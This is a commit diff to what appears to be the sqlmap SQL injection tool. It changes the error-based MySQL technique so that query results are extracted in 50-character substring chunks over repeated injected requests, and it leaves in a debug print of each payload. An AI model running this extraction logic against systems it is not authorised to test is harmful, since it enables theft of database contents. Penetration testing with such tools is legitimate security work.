first commit with mysql/error/substringing

lib/core/settings.py

@@ -248,7 +248,7 @@ MAX_RATIO = 1.0
 URI_INJECTION_MARK_CHAR = '*'
 
 # Maximum length used for retrieving data over MySQL error based payload due to "known" problems with longer result strings
-MYSQL_ERROR_TRIM_LENGTH = 100
+MYSQL_ERROR_CHUNK_LENGTH = 50
 
 # Do not unescape the injected statement if it contains any of the following SQL words
 EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ")

lib/techniques/error/use.py

@@ -29,7 +29,7 @@ from lib.core.enums import DBMS
 from lib.core.enums import EXPECTED
 from lib.core.enums import PAYLOAD
 from lib.core.settings import FROM_TABLE
-from lib.core.settings import MYSQL_ERROR_TRIM_LENGTH
+from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
 from lib.core.unescaper import unescaper
 from lib.request.connect import Connect as Request
 from lib.utils.resume import resume
@@ -39,12 +39,14 @@ reqCount = 0
 def __oneShotErrorUse(expression, field):
     global reqCount
 
+    offset = 1
+    retVal = None
+
+    while True:
         check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
         nulledCastedField = agent.nullAndCastField(field)
-
         if Backend.getIdentifiedDbms() == DBMS.MYSQL:
-        # Fix for MySQL odd behaviour ('Subquery returns more than 1 row')
+            nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, MYSQL_ERROR_CHUNK_LENGTH)
-        nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(%d))" % MYSQL_ERROR_TRIM_LENGTH)
 
         # Forge the error-based SQL injection request
         vector = kb.injection.data[PAYLOAD.TECHNIQUE.ERROR].vector
@@ -54,6 +56,7 @@ def __oneShotErrorUse(expression, field):
         injExpression = unescaper.unescape(injExpression)
         injExpression = query.replace("[QUERY]", injExpression)
         payload = agent.payload(newValue=injExpression)
+        print payload
 
         # Perform the request
         page, headers = Request.queryPage(payload, content=True)
@@ -65,9 +68,23 @@ def __oneShotErrorUse(expression, field):
                 or extractRegexResult(check, listToStrValue(headers.headers \
                 if headers else None), re.DOTALL | re.IGNORECASE)
 
-    dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(output)))
+        if Backend.getIdentifiedDbms() == DBMS.MYSQL:
+            if offset == 1:
+                retVal = output
+            else:
+                retVal += output if output else ''
 
-    return output
+            if not (output and len(output) >= MYSQL_ERROR_CHUNK_LENGTH):
+                break
+            else:
+                offset += MYSQL_ERROR_CHUNK_LENGTH
+        else:
+            retVal = output
+            break
+
+    dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(retVal)))
+
+    return retVal
 
 def __errorFields(expression, expressionFields, expressionFieldsList, expected=None, num=None, resumeValue=True):
     outputs = []